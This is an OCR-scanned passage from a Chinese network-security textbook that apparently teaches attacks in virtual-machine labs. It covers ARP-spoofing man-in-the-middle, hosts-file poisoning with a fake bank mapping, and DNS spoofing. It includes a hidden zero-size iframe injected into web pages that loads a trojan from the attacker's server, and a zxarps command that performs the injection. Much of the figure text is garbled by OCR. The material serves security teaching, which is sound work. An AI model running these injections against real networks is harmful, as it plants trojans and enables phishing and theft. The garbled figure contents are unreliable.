同样 ,攻击 者 使 用 伪造 的 ARP 应 答 报 文 刷新 网 关 的 ARP 缓存 表 , 使 得 受害 者 主机 
的 IP 映射 为 攻击 者 的 MAC 地址 。 伪 造 的 报 文 如 图 4-86 所 示 。 


gateway MAC 


hacker MAC 
从 28B 
一 一 
Link data ARP data padding data 
TB ~ UL RE 
0001 0800 
06 | 04 0002 
victim ip 
hacker MAC 


gateway ip 


gateway MAC 


图 4-86 发 送 给 网 关 的 ARP 欺骗 报 文 


这 个 伪造 的 ARP 应 答 报 文 共 60 字 节 ,包括 14 字 节 链 路 层 数 据 ,28 字 节 ARP 数据 
和 18 字 节 的 填充 数据 。 
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链 路 层 数据 中 ,目的 MAC 地 址 为 网 关 的 MAC 地 址 , 源 MAC 地 址 为 攻击 者 主机 
MAC ,协议 类 型 为 0x0806( 表 示 网 络 层 为 ARP 数据 ) 。 

ARP 数据 中 目的 IP 和 MAC 地 址 为 网 关 , 源 IP 地 址 为 受害 者 , 源 MAC 地 址 为 攻击 
者 主机 MAC, 这 使 得 网 关 误 认为 这 是 受害 者 发 给 自己 的 ARP 应 答 报 文 ,于 是 取出 源 IP 
和 源 MAC 地 址 记录 到 ARP 缓存 表 中 ,从 而 将 受害 者 的 IP 地 址 错误 地 映射 为 攻击 者 主 
机 的 MAC。 图 4-87 为 在 网 关上 查看 到 的 ARP 缓存 表 。 可 见 受 害 者 的 IP 地 址 50. 1.1.3 
映射 为 攻击 者 的 MAC 地址。 至 此 攻击 者 成 为 网 关 与 受害 者 通信 的 “中 间 人 ”。 


C:\Documents and Settings\Administrator>arp -a 


Interface: 50.1.1.1 on Interface OQx3000003 
Internet hddress Physical hddress Type 
50.1.1.3 受害 者 IP 96-9c-29-24-21-39 dynamic 
58.1.1.5 8080-50-56-c0-00-01 dynamic 


Interface: 10.1.1.1 on Interface Ox3000004 
Internet Address Physical Address Type 
站 全 下 到 9096-9c-29-fe-b9-85 dynamic 


攻击 者 MAC 


图 4-87 网 关 的 ARP 缓存 表 


第 五 步 : 转发 受害 者 发 出 的 HTTP 请 求 报 文 。 

由 于 受害 者 主机 的 ARP 缓存 中 网 关 的 IP 地 址 映射 为 攻击 者 的 MAC 地 址 ,因此 受 
害 者 在 浏览 Web 服务 器 主页 时 发 出 的 HTTP 请 求 报 文 会 错误 地 提交 给 攻击 者 。 图 4-88 
为 攻击 者 截获 的 HTTP 请 求 报 文 。 


s-port d-port 
seq num 
ack unm 
hacker MAC window 
victim MAC check We 
个 20B 个 nB 
a | 二 -一 一 
Link data IP header | TCP head HTTP header 
me 4 Tm ~ 4 
14B 20B 
length GET/index.asp 
id flag Accept:*/* 
check Host:www.web.com 
victim ip Connection:Keep-Alive 
Web server ip 


图 4-88 攻击 者 截获 的 HTTP 请 求 报 文 


个 HTTP 请 求 报 文 包括 14 字 节 链 路 层 数据 ,20 字 节 IP 首部 ,20 字 节 TCP 首部 ， 
i 季 的 HTTP 数据 。 
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在 链 路 层 数 据 中 , 源 MAC 地 址 为 受害 者 主机 MAC, 目的 MAC 地 址 为 攻击 者 
MAC。IP 首部 中 源 IP 地 址 为 受害 者 ,目的 IP 地 址 为 Web 服务 器 。 在 HTTP 数据 中 携 
带 的 信息 是 请 求 浏览 index. asp。 

攻击 者 重新 封装 这 个 报 文 之 后 ,将 其 转发 出 去 。 转 发 的 HTTP 请 求 报 文 如 图 4-89 
所 示 。 可 见 只 是 将 目的 MAC 地 址 改 为 网 关 , 源 MAC 地 址 改 为 攻击 者 ,其 他 字段 不 变 。 


S-port d-port 


seq num 


ack unm 


gateway MAC window 
hacker MAC check ug 


个 20B 介 nB 


Link data 


14B 


GET/index.asp 
Accept:*/* 


Host:www.web.com 
victim ip Connection:Keep-Alive 


Web server ip | 


图 4-89 攻击 者 转发 的 HTTP 请 求 报 文 


第 六 步 : 修改 、 转 发 Web 服务 器 返回 的 应 答 报 文 。 


由 于 网 关 的 ARP 缓存 表 中 受害 者 的 IP 地 址 映射 为 攻击 者 的 MAC 地 址 ,因此 网 关 
将 HTTP 应 答 报 文 错误 地 提交 给 攻击 者 。 图 4-90 为 攻击 者 截获 的 HTTP 应 答 报 文 。 


seq num 


ack unm 


hacker MAC 
gateway MAC 


个 20B 个 nB 个 


normal content 


Link data IP header HTTP header HTTP data 
14B U 


20B 几 nB 


length HTTP/1.1 200 OK 
id flag Server:IIS/5.1 
check Date: 


Web server ip Content-Length:23 


victim ip 


图 4-90 攻击 者 截获 的 HTTP 应 答 报 文 
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在 链 路 层 数据 中 ,目的 MAC 地 址 为 攻击 者 , 源 MAC 地 址 为 网 关 。 在 IP 首部 中 , 目 
的 IP 地 址 为 受害 者 IP, 源 IP 地 址 为 Web 服务 器 IP。 在 HTTP 数据 部 分 包括 index. asp 
网 页 文件 的 源 代码 。 

攻击 者 修改 并 转发 的 HTTP 应 等 报 文 见 图 491。 可 见 在 链 路 层 数据 中 目的 MAC 地 址 
改 为 受害 者 , 源 MAC 地 址 改 为 攻击 者 。 在 HTTP 数据 中 植 人 了 一 句 框架 式 挂 马 代码 。 


s-port d-port 
seq num 
ack unm <iframe src= “http:/10.1.1.3/1.html”; 
width="0"height="0” a 
victim MAC window framebor der="0”></iframe> COU. 
hacker MAC check ue normal content 


个 20B 个 nB 个 
= -| - 一 | 
Link data IP header TCP head HTTP header HTTP data 


-一 一 一 一 一 L | 0 


14B 20B nB 
length HTTP/1.1 200 OK 
id flag Server:IIS/5.1 
check Date: 
Web server ip Content-Length:103 
victim ip 


图 4-91 攻击 者 转发 的 HTTP 应 答 报 文 


第 七 步 : 受害 者 被 植 人 网 页 木马 。 
受害 者 浏览 的 index. asp 中 被 植 信 了 挂 马 代码 , 如 图 4-92 所 示 。 这 句 挂 马 代码 会 引 
导 受 害 者 到 黑客 的 Web 服务 器 (10. 1. 1. 3) 去 下 载 并 运行 木马 控制 端 (1. exe)。 


习 xgt - Mcrosoft Internet Explorer 


立 件 对)” 编辑 包 收 启 外 才 助 Qf 


@ 避 -日 -着 国 入 有时 次 Wx 加 区 :党国 : 汉 


地 址 加 ) | 御 http://10.1.1.2/index. asp 


<meta http-equiu="Content-Type'” content="text/htnl; charset=gb2312"> 
<title>xgt</title> 


font-fanily: “宋体 "*; 
font-size: 9pt; 
font-style: normal; 
line-height: 168%; 
color: #9999983 


图 4-92 受害 者 浏览 的 index. asp 中 被 植 人 了 挂 马 代 码 
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机 (50.1.1. 37 与 


在 受害 者 主机 上 运行 netstat -an 命令 可 以 查看 到 受害 者 了 
(50. 1.1.2) 之 间 的 pcshare 控制 连接 ,如 图 4-93 所 示 。 


State 

LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


Address 
is 


， 
©3 


LISTENING 
LISTENING 
ESTABLISHED 
[3 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


图 4-93 


第 八 步 : 黑客 通过 pcshare 进行 远程 
zxarps 攻击 软件 在 发 现 HTTP 应 答 数 据 包 后 会 向 其 中 植 和 一句 挂 马 代 码 ,zxarps 的 
运行 情况 如 图 4-94 所 示 , 可 见 其 执行 了 三 次 代码 植 信 。 


命令 提示 符 - zxarps. exe -idx 0 -ip 50.1.1.3 -port 80 -insert “《iframe src="http://10.1.1. 
Default Gateway . . : 59.1.1.1 
[x] Bind on 56.1.1.2 UMware Accelerated AMD PCNet Adapter... 
Scanning Alive Host 
Found Alive Host: 
50.1.1.3 00-0C-29-9A-60-A8 


成 功 插入 代码 . 
16.1.1.2 -> 50.1. 


图 4-94 ”zxarps 执行 了 三 次 代码 植 入 


成 功 植 人 PcShare 木马 之 后 ,攻击 者 就 可 以 利用 PcShare 对 受 
制 ,远程 控制 界面 如 图 4-95 所 示 。 


书 者 主机 进行 远程 控 


网 


入 PcShare 远 程控 制 免费 版 本 [20070920] 暗 组 友情 考 版 -PcShare 官 方 论坛 : www- pcshare- cn 
文件 @) 设置 oJ) 帮助 0 
局“ 本 草 十 各 全 
文件 管理 远程 协助 由 女 绪 端 主公 近 进程 各 理 广 册 表 管理 且 全 视频 共 控 窗口 管理 刷新 ff 参数 设置 凶 娃 客户 六 助 相关 信息 5 


管 通 客 户 姐 | 
被 控制 端 TP 地 址 1 计算 机 名 客户 注释 


客户 连接 信息 [文件 下 载 癌 理 


入 ETp 直 全 


- 并 ] 已 下 志 所 分 组 【 竺 通 雪 组 】 


【当前 组 数量 001 个 】【 总 玖 量 o01 个 


图 4-95 ”PcShare 的 远程 控制 界面 
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14710 基于 ARP 欺骗 的 DNS 欺骗 


4.10.1 域名 


域名 (Domain Name) 是 由 一 串 用 点 分 隔 的 “有 特定 意义 ”的 字符 串 组 成 的 Internet 上 
一 台 计 算 机 的 名 称 , 例 如 www. ccpc. edu. cn。 域 名 采用 的 是 分 级 结构 ,从 右 至 左 , 第 一 
级 代表 国家 类 型 ,常见 的 取 值 包括 cn 中 国 us 美国 jp 日本。 第 二 级 是 机 构 类 型 ,例如 ， 
edu 教育 机 构 、com 商业 机 构 、gov 政府 机 构 、mil 军事 机 构 、org 非 启 利 机 构 。 第 三 级 是 
机 构 名 称 , 例 如 ccpc、sina、yahoo、163、sohu。 第 四 级 是 服务 类 型 ,例如 www、mail、news、 
Sport。 
与 IP 地 址 一 样 ,域名 也 是 计算 机 的 唯一 标识 ,例如 ,浏览 中 国 刑警 学 院 的 主页 ,可 以 
在 I 浏览 器 的 地 址 栏 输入 *www. ccpc. edu. cn”, 也 可 以 通过 IP 地址 210. 47. 128. 202 访 
问 。 那 么 为 什么 要 设计 域名 ? 原因 就 是 域名 是 由 一 些 有 特定 意义 的 字符 串 组 成 的 .便于 
记忆 ,而 IP 地 址 是 由 一 组 枯燥 的 数字 组 成 .不 好 记忆 。 但 计算 机 需要 使 用 IP 地 址 来 完成 
数据 通信 ,因此 需要 一 种 机 制 来 完成 域名 到 IP 地 址 的 转换 ,这 种 机 制 就 是 DNS 协议 。 


4102 域名 解析 过 程 


下 面 举例 说 明 域名 解析 过 程 。 图 4-96 的 DNS 服务 器 的 转换 表 中 记录 了 多 组 域名 和 
IP 地 址 的 映射 记录 ,客户 在 自己 主机 的 下 浏览 器 地 址 栏 中 输入 “*http://www. sina. 
com. cn” 回 车 ,之 后 客户 机 会 按照 以 下 步骤 完成 域名 解析 。 首 先 检查 自己 的 hosts 文件 ， 
这 个 文件 中 记录 了 一 些 主机 域名 与 IP 地 址 的 映射 关系 ,如 果 hosts 文件 中 包含 www. 
sina. com. cn 对 应 的 IP 地 址 , 则 直接 取出 使 用 ,如 不 包含 , 则 检查 本 机 的 DNS 缓存 表 。 


sina 服 务 器 “www.sina.com.cn DNS 服务 器 DNS 转换 表 


61.1.1.2 www.sina.com.cn 
马 9 


Www.163.com 


@DNS 应 答 61.1.1.2 $50.20.10.79 
Www.ccpc.edu.cn 
210.47.128.202 

@ 双 向 通信 
= (DNS 解析 请 求 www.sina.com.cn 

[el 
一 一 
客户 

http://www.sina.com.cn 

外 检查 hosts 文 件 

@ 检 查 DNS 缓 存 表 


图 4-96 域名 解析 过 程 


主机 每 次 通过 DNS 协议 获得 一 组 域名 与 IP 地 址 的 映射 记录 ,都 会 将 这 组 记录 存储 
在 DNS 缓存 表 中 ,以 后 主机 可 以 直接 从 DNS 缓存 表 中 取出 这 个 域名 对 应 的 IP 地 址 ,而 


105 


ED 网 络 安全 基础 ”gl 


不 需要 再 次 使 用 DNS 协议 ,这 样 可 以 提高 通信 效率 。 如 果 DNS 缓存 表 中 也 不 包含 
www. sina. com. cn 的 IP 地 址 ,这 时 客户 机 才 会 使 用 DNS 协议 。 

DNS 协议 采用 请 求 .应 答 工 作 模 式 , 客 户 首先 向 DNS pe 
求解 析 域 名 www. sina. com. cn 对 应 的 IP 地址。DNS 服务 器 收 到 这 个 请 求 之 后 ,会 返回 

一 个 DNS 应 答 报 文 ,其 中 就 携带 了 sina 服务 器 对 应 的 IP 地 址 61. 1. 1.2。 之 后 客户 就 可 

以 与 服务 器 进行 直接 的 双向 通信 ,完成 网 页 浏览 的 任务 。 

通过 上 面 的 分 析 可 以 看 出 ,主机 在 进行 域名 解析 时 并 不 是 直接 使 用 DNS 协议 ,而 是 
按照 先 检查 hosts 文件 ,再 检查 DNS 缓存 表 , 最 后 使 用 DNS 协议 的 流程 处 理 。 


4103 hosts 文件 及 其 安全 隐患 


hosts 文件 中 记录 了 一 些 主机 域名 与 IP 地 址 的 映射 关系 ,在 Windows 系统 中 它 保存 
在 “系统 盘 \WINDOWS\system32\drivers\etc” 路 径 下 。 下 面 通过 一 个 训练 来 学 习 hosts 
文件 的 使 用 方法 。 

训练 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,在 本 机 的 hosts 文件 中 添加 一 条 
域名 映射 记录 ,将 Windows XP 虚拟 机 的 IP 地 址 映射 为 域名 www. abc. com, 然 后 在 本 机 
执行 ping www. abc. com, 查 看 测试 结果 。 

第 一 步 : 以 host-only 方式 启动 Windows XP 虚拟 机 ,配置 IP 地 址 ,测试 本 机 与 虚拟 
机 之 间 的 通信 (配置 步骤 略 ) 。 

第 二 步 : 在 本 机 的 hosts 文件 中 添加 一 条 域名 映射 记录 。 

在 本 机 的 hosts 文件 中 添加 一 条 域名 映射 记录 ,将 Windows XP 虚拟 机 的 IP 地 址 
192. 168. 0. 20 映射 为 域名 www. abc. com, 配 置 结果 如 图 4-97 所 示 。 


文件 人 ) 编辑 于 ) 格式 0) 查看 WD 帮助 0 
# For exanple: 
失 


4 182.54.94.97 rhino .acme -Com # Source Seruer 
状 38.25.63.19 X-acme -Com # x client host 


127-9.9.1 localhost 
192.168.9-.29 Www -abc .Com 


< 


图 4-97 配置 hosts 文件 


第 三 步 : 在 本 机 执行 ping www. abc. com, 查 看 测试 结果 。 

在 本 机 执行 ping www. abc. com, 测 试 结果 如 图 4-98 所 示 。 可 见 域名 解析 成 功 。 

通过 上 面 的 测试 可 以 看 出 hosts 文件 的 优先 级 高 于 DNS 协议 ,如 果 hosts 文件 被 人 
为 恶意 修改 (例如 ,黑客 利用 木马 程序 控制 受害 者 主机 ,进而 修改 hosts 文件 ) ,将 导致 严 
重 后 果 。 例 如 ,黑客 在 hosts 文件 中 添加 如 图 4-99 映射 记录 。 

这 条 记录 导致 受害 者 通过 域名 访问 www. icbc. com. cn 站 点 时 ,与 其 实际 通信 的 将 
是 192. 168.0. 20 这 人 台 主 机 ,而 在 其 上 很 可 能 运行 的 是 一 个 伪造 的 ,用 于 盗 取 账 户 信息 的 
钓鱼 站 点 。 
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oD: \¥INDOVS\systen32\cad. exe [ ->] 
D:\Documents and Settings\xgt>ping wuw.abc.com 


Pinging wuw.abc.com [192.168.0.20] with 32 bytes of data: 


Reply from 192.168.0.20: bytes:32 time=6ms TTL:128 
192.168.0.2 ytes=:32 time 人 1ms TTL:=128 
192.168.0.26: bytes=32 time 人 1ms TTL:=128 

Reply from 192.168.0.20: bytes:32 time 人 1ms TTL:128 


Ping statistics for 192.168.0.20: 

Packets: Sent : 4, Received : 4, Lost = 0 (0% loss), 
Approximate round trip times in milli-seconds: 

Minimum = Oms, Maximum = 6ms, Average = 1ms 


图 4-98 测试 结果 


文件 EE) 编辑 于) 格式 0) 查看 (WD) 帮助 人 0 


127.8.8.1 localhost 
192.168.8.20 www -icbc -com-cn 


< 


图 4-99 ”恶意 映射 记录 


4104 配置 DNS 服务 器 


DNS 服务 是 网 络 内 的 一 种 重要 服务 ,下 面 结 合 具体 训练 介绍 如 何在 Windows 2000 
系统 主机 上 开启 DNS 服务 功能 。 
训练 : 以 host-only 方式 启动 Windows XP 和 Windows 2000 虚拟 机 ,按照 图 4-100 
配置 IP 地 址 。Windows XP 虚拟 机 作为 Web 服务 器 ,其 域名 为 www. ccid. com.,IP 地 址 
为 192. 168. 0. 20。Windows 2000 虚拟 机 作为 DNS 服务 器 ,完成 域名 解析 任务 。 本 机 作 
为 客户 端 ,使 用 www. ccid. com 浏览 Web 服务 器 主页 。 


Web 服 务 器 DNS 服务 器 
Windows XP 虚拟 机 Windows 2000 虚 拟 机 
Www.ccid.com 本 
192.168.0.20 (3 5 192.168.0.4 
host-only 
点 192.168.0.5 
本 机 客户 


图 4-100 测试 环境 


第 一 步 : 以 host-only 方式 启动 Windows XP 和 Windows 2000 虚拟 机 ,按照 图 4-100 
配置 IP 地 址 (步骤 略 )。 
第 二 步 : 在 Windows XP 虚拟 机 上 安装 一 个 论坛 站 点 ,在 本 机 测试 访问 。 
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在 Windows XP 虚拟 机 上 安装 一 个 论坛 站 点 。 在 本 机 测试 访问 站 点 ,结果 如 
图 4-101 所 示 。 


/5 深圳 城市 信息 贴吧 论坛 - Windows Internet Explorer 
TRY 

FO ht /i 168.0 20/indes sa 
文件 外 编辑 四 ”查看 如” 收 诚 天 和 ”工具 0) 帮助 0 

宽 收 藏 严 | 次 居于 议 辣 站 。 居 免费 hotnail 居 Tt 讯 计 ~ 
| 硬 剖 贼 信息 贴吧 论坛 | 人 前- 国 -局 出- 中 - 安全- IRO- 加 ” 


CN ESE 


欢迎 您 ! 朋友 ! :-) 


人 CTmCSR 人 冰 E 区 ce 《D0Case 辐 ) 


用 户 各 欢迎 来 到 深圳 城市 信息 贴吧 论坛 ! 
和 加 经 怕 注册 ， 一 样 可 以 在 这 由 所 以 计 !! 


图 4-101 本 机 测试 访问 站 点 


第 三 步 : 在 Windows 2000 虚拟 机 上 配置 DNS 映射 记录 ,将 域名 www. ccid. com 映 
射 为 192. 168. 0. 20。 

在 Windows 2000 虚拟 机 上 单 击 “ 开 始 ” 一 “程序 ”一 “管理 工具 ”一 DNS 一 右 击 “ 正 向 
搜索 区 域 ”一 新 建 区 域 " 一 下 一 步 ? 一 “标准 主要 区 域 ”- 下 一 步 ?~ 输 入 区 域名 称 
“ccid. com” 一 “下 一 步 ” 一 “下 一 步 ” 一 “完成 >。 结 果 如 图 4-102 所 示 。 


上 总 控制 全 C) 窗口 wD 村 助 td 
」 拧 作 () 查看 W || 外 沙 | 凶 | 四 | 四 驹 | 多 


四 上 CCPC-CMKS8906BU 
日 局 

由 Ly caidcom 
由 回 反 向 搜索 区 域 


图 4-102 新 建 区 域 


右 击 ccid. com 一 新 建 主 机 一 名 称 输入 


“www”,，IP 地 址 输入 “192. 168. 0. 2 如 | 国富 一 一 
图 4-103 所 示 一 “添加 主机 ”。 名 称 0 果 为 裤 则 使 用 其 父 域名 称 ) 0: 
这 样 一 来 ,在 DNS 服务 器 上 添加 了 一 条 映 | 宅 
射 记录 www. ccid. com 映射 为 192. 168. 0. 20 ,如 ln 
图 4-104 所 示 。 至 此 DNS 服务 器 配置 完成 。 厂 创建 相关 的 指针 FPTR) 记 录 (C) 
第 四 步 : 为 本 机 配置 DNS 服务 器 了 ,测试 
过 域名 访问 论坛 re 
将 本 机 的 DNS ;服务 器 IP 地 址 配置 为 192. 图 4-103 “新 建 主 机 ”对 话 框 
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名 ,控制 和 (CO 窗口 (帮助 由 
[EE EE BILE 
名 称 E EE3 I 
目 ( 与 艾 文件 夹 相同 ) 起 始 授权 机 构 [1] ccpe-cmks8906bu,, adm,.， 


与 父 文件 夹 相 同 ) 名 称 服务 器 cepc-cmks8906bu. 
ww 主机 192,168.0.20 


日 - 目 ccpc-CMK589068U 
上 正 向 搜索 区 域 


由 加 反 向 搜索 区 域 


图 4-104 添加 了 一 条 映射 记录 


168. 0.4, 配 置 结果 如 图 4-105 所 示 。 


D:\Documents and Settings\xgt>ipconfig /all 


Windows IP Configuration 


Host Name 他 洛 二 吉 : ccpc-a6e3dala51 
Primary Dns Suffix i ; : 

Node Type . .... snknoun 

IP Routing Enable' i Ee 2 No 

WINS Proxy Enabled. . . CE: . :No 


Ethernet adapter 本 二 朗 


Connection-specific DNS Suffix 

Description . . .. .... . : UMware Uirtual Ethernet hdapter for UMnet1 
Physical hddress 四 . : 00-50-56-C0-060-01 

Dhcp Enabled. . . ... 人 . :No 

IP Address. . 人 roe : 192.168.0.5 

Subnet Mask . .......... : 255.255.255.0 

Default Gateway . A 

DNS Servers . 。。 -。。。，.， .1192.168.8.4 


图 4-105 为 本 机 配置 DNS 服务 器 IP 


在 本 机 使 用 域名 www. ccid. com 浏览 论坛 站 点 ,测试 结果 如 图 4-106 所 示 ,可见 
DNS 服务 器 正常 完成 了 域名 解析 工作 


/深圳 城市 信息 贴吧 论坛 - Windows Internet Explorer 


GO-E id 


文件 EE) 编辑 EE) 查看 WW) 收藏 夹 ) 工具 YI) 才 助 0) 
寞 收藏 夹 | 这 器 ~ 且 免 费 Hotnail 已] 
看 评 吉 城市 信息 贴吧 论坛 全- 国 3 可 ” 页面) 安全 G)- 工具 QQ)， 各 


CNE "a 4 : CNKBBS 


欢迎 您 ! 朋友 ! :-) 


人 数 我 要 注册 We 一 ep 
让 -新 闻 资 读 
襄 - 互 联网 络 
自 - 网 络 编程 
身 - 贴 图 专区 
自 - 自 由 市 场 «~ ey 如 您 懒得 注册 ， 一 样 可 以 在 这 畅 所 


欢迎 来 到 深圳 城市 信息 贴吧 论坛 ! 


@ Internet 


图 4-106 测试 结果 
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4105 DNS 缓存 表 


主机 每 次 通过 DNS 协议 获得 一 组 域名 与 IP 地 址 的 映射 记录 ,都 会 将 这 组 记录 存储 
在 DNS 缓存 表 中 ,以 后 主机 可 以 直接 从 DNS 缓存 表 中 取出 这 个 域名 对 应 的 IP 地 址 ,而 
不 需要 再 次 使 用 DNS 协议 ,这 样 可 以 提高 通信 效率 。 
查看 DNS 缓存 表 的 命令 是 ipconfig /displaydns, 图 4-107 是 在 本 机 查看 DNS 缓存 
的 结果 ,可 见 其 中 记录 了 域名 www. ccid. com 与 IP 地 址 192. 168. 0. 20 的 映射 关系 。 删 
除 DNS 缓存 表 的 命令 是 ipconfig /flushdns, 执 行 该 命令 之 后 ,DNS 缓存 表 被 清空 ,之 后 
本 机 再 次 访问 www. ccid. com 时 ,将 会 重新 使 用 DNS 协议 来 获得 对 应 的 IP 地 址 。 


JO¥S\systen32\cad. exe 


WWW.ccid.com 


Record Name . 5 WWW.ccid.com 
Record Type . .. 


Time To Live | 

Data Length . $ 

Section . . : hnswer 

A (Host) Recor : 192.168.0.20 


图 4-107 查看 DNS 缓存 


4.106 DNS 报 文 分 析 


DNS 协议 采用 请 求 .应答 工作 模式 ,客户 首先 向 DNS 服务 器 提交 一 个 解析 请 求 , 请 
求解 析 某 个 域名 对 应 的 IP 地 址 。DNS 服务 器 收 到 请 求 之 后 ,会 返回 一 个 DNS 应 答 报 
文 , 其 中 就 携带 了 域名 对 应 的 IP 地 址 。 下 面 结合 实例 来 学 习 DNS 请 求 和 应 答 报 文 的 
格式 。 

训练 : 在 4. 10.4 节 的 实验 环境 中 ,使 用 Sniffer 捕获 分析 DNS 请 求 和 应 答 报 文 。 

第 一 步 : 按照 4. 10. 4 节 配 置 实验 环 境 ( 步 又 略 ) 。 

第 二 步 : 在 本 机 浏览 论坛 站 点 ,同时 使 用 Sniffer 捕获 通信 数据 。 

在 本 机 的 下 浏览 器 地 址 栏 中 输入 “http://www. ccid. com/index. asp” 浏 览 论 坛 站 
点 ,同时 使 用 Sniffer 捕获 通信 数据 ,结果 如 图 4-108 所 示 。 


[Souce Addhess Dest Addess 
VMVareCO 0001 |Broadcast 


N 
1 

1 
3 |[192.168.0.5] |[192.168.0.4] |D) 
4 |1192.168.0.4] {192.168.0.5] 
5 |[192.168.0.5] |www.ccid .ci 
6 
7 
8 
3 


gO 
vy. ccid.con |[192 168.0 5] 
[192.168.0.5] |www.ccid.conm 
[192.168.0.5] |www.ccid.con 
www.ccid.con | [192.168.0.5] 
10 |www.ccid.con |[192.168.0.5] 
11 |[192.168.0.5] ww.coid.com 
12 |[192.168.0.5] |www.coid.con 
13 |www.ccid.com |[192.168.0.5] 
Mey eid.con [L192.168.0.5} 
Yel 192.169.0.51 [yy coid.e T 
16 |www.ccid'con |[192°768.0°8] 
17 |7733°768.0°8] | wsw ccid. con 


图 4-108 使 用 Sniffer 捕获 的 通信 数据 
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前 两 个 报 文 是 本 机 使 用 ARP 获得 DNS 服务 器 的 MAC 地 址 ,第 3、4 个 数据 包 就 是 
DNS 请 求 和 DNS 应 答 报 文 。 第 5.6、7 个 数据 包 是 TCP 三 次 握手 建立 连接 报 文 。 后 面 
是 具体 的 TCP 通信 数据 包 , 用 来 完成 网 页 传输 任务 。 下 面具 体 分 析 DNS 请 求 和 应 答 
报 文 。 

图 4-109 给 出 的 是 DNS 请 求 报 文 ,Sniffer 按照 TCP/IP 的 4 层 体系 结构 对 该 报 文 进 
行 解析 ,传输 层 采 用 的 是 UDP, 并 且 使 用 的 是 UDP 的 53 端口 。 图 中 将 应 用 层 数 据 即 
DNS 数据 完全 展开 ,第 一 个 字段 是 ID , 值 为 43 693,DNS 协议 利用 这 个 字段 对 请 求 和 应 
答 报 文 进行 匹配 , 即 DNS 应 答 报 文 的 ID 字段 值 也 应 为 43 693。Question count 字段 表 
明 该 报 文 携带 了 一 个 问题 ,ZONE Section 域 存储 的 就 是 问题 的 内 容 , 可 见 这 个 问题 是 请 
求解 析 www. ccid. com 对 应 的 IP 地 址 。 


TT 


DIC: Ethertype=0800, size=72 bytes 
TP a 168.0.4] S=[192.168.0.5] LEN=38 ID=1666 
UDP: D=53 S=61929 LEN=38 


DNS: ID = 43693 
DNS: Flags = 01 
DNS: 0 = Comnand 


DNS: .000 0 Query 
DNS 0. = Not truncated 
DNS 1 = Recursion desired 
BDNS: Flags = 0X 
DNS 0 = Non Verified data NOT acceptable 
DNS: Question count 1 
BB DNS: Answer count =0 
BY DNS: Authority count =0 
DNS: Additional record count = 0 


BB DNS: ZONE Section 
DNS Nane = www.ccid.com 


DNS Type = Host address (A.1) 
BB DNS Class = Internet (IN,1) 
DNS 


图 4-109 DNS 请 求 报 文 


图 4-110 给 出 的 是 DNS 应 答 报 文 ,可 见 这 个 报 文 的 ID 字段 与 之 前 的 请 求 报 文 相 同 ， 
都 是 43 693。Answer section 域 存储 的 是 域名 解析 的 答案 , 即 www. ccid. com 对 应 的 IP 
地 址 是 192. 168. 0. 20 。 


4107 基于 ARP 欺 骗 的 DNS 欺骗 测试 


1. 基 于 ARP 欺骗 的 DNS 欺骗 简介 

图 4-111 为 攻击 示意 图 。 攻 击 者 首先 对 网 关 和 受害 者 实施 ARP 欺骗 攻击 ,使 自己 成 
为 受害 者 与 外 网 通信 的 “中 间 人 ”。 受 害 者 在 浏览 www. web. com 站 点 时 发 出 的 DNS 请 
求 报 文 会 经 过 攻击 者 主机 转发 给 DNS 服务 器 。DNS 服务 器 将 域名 www. web. com 对 应 
的 IP 地 址 10.1.1. 2 封装 在 DNS 应 答 数 据 报 中 返回 。 攻击 者 收 到 返回 报 文 之 后 ,会 将 其 
中 的 IP 地 址 10.1.1.2 改 为 10.1.1.3( 即 黑客 服务 器 的 IP) ,再 将 修改 之 后 的 DNS 应 答 
报 文 转发 给 受害 者 。 这 样 一 来 ,在 受害 者 DNS 缓存 中 ,域名 www. web. com 被 映射 为 错 
误 的 IP 地 址 10. 1. 1. 3, 这 导致 受害 者 之 后 的 通信 被 错误 引导 至 黑客 服务 器 ,而 这 可 能 


一 个 挂 马 站 点 或 者 是 一 个 “钓鱼 网 站 ”。 
人 


192 .168.0 5 192 .168.0.4] IDNS: C ID=43693 OP=QUERY NAME=www CCid con 


Ethertype=0800. size=88 bytes 
D=[192.168.0.5] S=[192.168.0.4] LEN=54 ID=33967 
D=61929 S=53 IEN=54 

: 一 -一 Internet Domain Nane Service header -一 一 


蚁 DNS: ID = 43693 
DNS: Flags = 85 
各 


DNS = Response 

肪 DNS 1.. = Authoritative answer 
DNS: .000 0. = Query 
DNS . Not truncated 
DNS: Flags = 8X 

电 DNS 0 = Data NOT verified 
DNS: 1 = Recursion available 
DNS: Response code = OK (0) 


电 DNS 0 = Unicast packet 
DNS: Question count = 
DNS: Answer count 
DNS: Authority count 

DNS: Additional record count 


DNS 
DNS: ZONE Section 


a 
oorrp 


DNS Nane = www .ccid com 

DNS Type = Host address (A.1) 
DNS Class = Internet (IN.1) 
DNS 

DNS: Answer section 

DNS Nane = www.ccid.com 

DNS Type = Host address (A.1) 
DNS Class = Internet (IN.1) 
DNS Tine-to-live = 3600 (seconds) 
DNS Length = 4 

DNS Address = [192.168.0.20] 


图 4-110 DNS 应 答 报 文 


DNS translation 


Www.web.com 
10.1.1.2 ye 


Www.163.com Web Server 
Www.web.com 


50.20.10.79 

www.hack.com 10.1.1.2 

10.1.1.3 heacker 
Web Server 


www.hack.com 
10.1.1.3 


Victim 


CD DNS request www.web.com 
@) DNS reply 10.1.1.3 
G) modified DNS reply hacker DNS buffer 


图 4-111 攻击 示意 图 


2 测试 环境 和 测试 目的 

测试 环境 如 图 4-112 所 示 。 本 机 作为 受害 者 ,Windows XP 虚拟 机 1 作为 正常 Web 
服务 器 ,Windows XP 虚拟 机 2 作为 黑客 的 Web 服务 器 ,Windows XP 虚拟 机 3 作为 攻击 
者 ,Windows 2000 虚拟 机 作为 网 关连 接 两 个 网 络 , 同 时 还 担任 DNS 服务 器 的 角色 ,各 个 
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对 象 的 地 址 信息 如 图 4-112 所 示 。 
测试 的 目的 是 受害 者 浏览 正常 的 Web 服务 器 主页 ,但 实际 看 到 的 是 黑客 Web 服务 
器 的 主页 。 


Web hacker 
服务 器 服务 器 
10.1.1.2 Windows XP Windows XP 10.1.1.3 
00-0C-29-25-66-36 虚拟 机 1 虚拟 机 2 上 00-0C-29-FE-B9-85 


10.1.1. 


00-0C-29-A3-70-45 受害 者 
: Wn 网 关 50.1.1.3 
Windows 2000 虚 拟 机 1 
a es DNS 服 务 器 本 机 cy 00.50-56.C0-00-1 


00-0C-29-A3-70-40 


虚拟 机 3 00-0C-29-24-21-39 
攻击 者 
图 4-112 测试 环境 


